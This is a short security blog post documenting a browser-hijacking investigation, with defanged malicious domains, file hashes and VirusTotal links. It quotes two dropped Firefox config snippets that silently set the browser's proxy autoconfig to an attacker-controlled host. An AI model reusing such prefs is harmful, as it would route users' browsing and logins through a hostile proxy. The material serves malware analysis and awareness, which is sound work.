full screen background image
Search
Sunday 18 February 2018
  • :
  • :

Browser Hijack – The journey – Cybersecurity research

A new software test.
Something announced as free … but it’s not really for free.
Today I wanted to see what level of browser hijacking is
running out there.

Browses hijack:

“A program changes your home page, redirects browser typos to a search engine you have never heard of or to other sites. This is annoying, popping up ads and displaying unwanted site”

comodo.com

So.

I have seen alot of ”good” things like: a java ”update”, winning iphones, free apps, cassino offers, games, some redirections… etc.

 

This code was injected in my browser.

”xxxx.rsc.cdn77.org install malicious extensions, plug-ins, ads, banner ads, pop-up ads, etc and creates mess on your browsers. Even if mistakenly you click on any ads or link then also it redirects you to some other websites. It also uses cookie and keep spy on your online activities like browsing history, mostly visited websites, login, password details, etc. The redirect virus has the ability to disable the anti-virus and other security program without your knowledge.” Source: removemalwarevirus.com

Here you can see some of the domains i visited in this journey:

  • rsc.cdn77[.]org
  • liveadexchanger[.]com
  • static.199.55.201.138.clients.your-server[.]de
  • timetrackingext.xyz
  • 2048-game[.]review
    search.findthatsearch[.]com
    findthatsearch[.]com
    minesweepx[.]com
    solitaire4u2[.]com
    tetrigame[.]com
    certifiedwinners[.]info
    wtrtr1[.]com
    ads.dlvr[.]live
    betano[.]com
    digitaldsp[.]com
    c.codeonclick[.]com
    join.pro-gaming-world[.]com

I found some extra files on my browsers… .js , .cfg and .dll.

3327329.js — ”pref(“general.config.obscure_value”, 0);pref(“general.config.filename”, “3321791.cfg”);pref(“network.proxy.type”, 2);pref(“network.proxy.autoconfig_url”, “http://unstop-access.biz/wpad.dat?cb241ce907c6857bc3c28a220ec2076437981150”);pref(“network.proxy.autoconfig_url.include_path”, true);”
3321791.js — ”pref(“general.config.obscure_value”, 0);pref(“general.config.filename”, “3327329.cfg”);pref(“network.proxy.type”, 2);pref(“network.proxy.autoconfig_url”, “http://unstop-access.biz/wpad.dat?cb241ce907c6857bc3c28a220ec2076437981150”);pref(“network.proxy.autoconfig_url.include_path”, true);”

Adware Agent – PUA.YoBrowser:

myographical.dll = sandastros.dll

  • MD5: 8ecbfcb3c062755a3d5b3851cbe98357
  • SHA-1: 5d1cccd87d0e4d81090d288d201d9c4467765513

Virus Total Report

Virus Total Graph

Fake Java Update

Virus Total Report

It is clear that it is not a pleasant trip for those who do not know how to protect themselves.

Have fun & Stay safe!!!

http://www.prodefence.org/

Reviews

  • 9
  • 9
  • 7
  • 8
  • 8
  • 8.2

    Score



Alex Anghelus

Cyber Security, Pentesting & Ethical Hacking Freelancer - Malware Reverse Engineering Researcher


One thought on “Browser Hijack – The journey – Cybersecurity research

Leave a Reply

Your email address will not be published. Required fields are marked *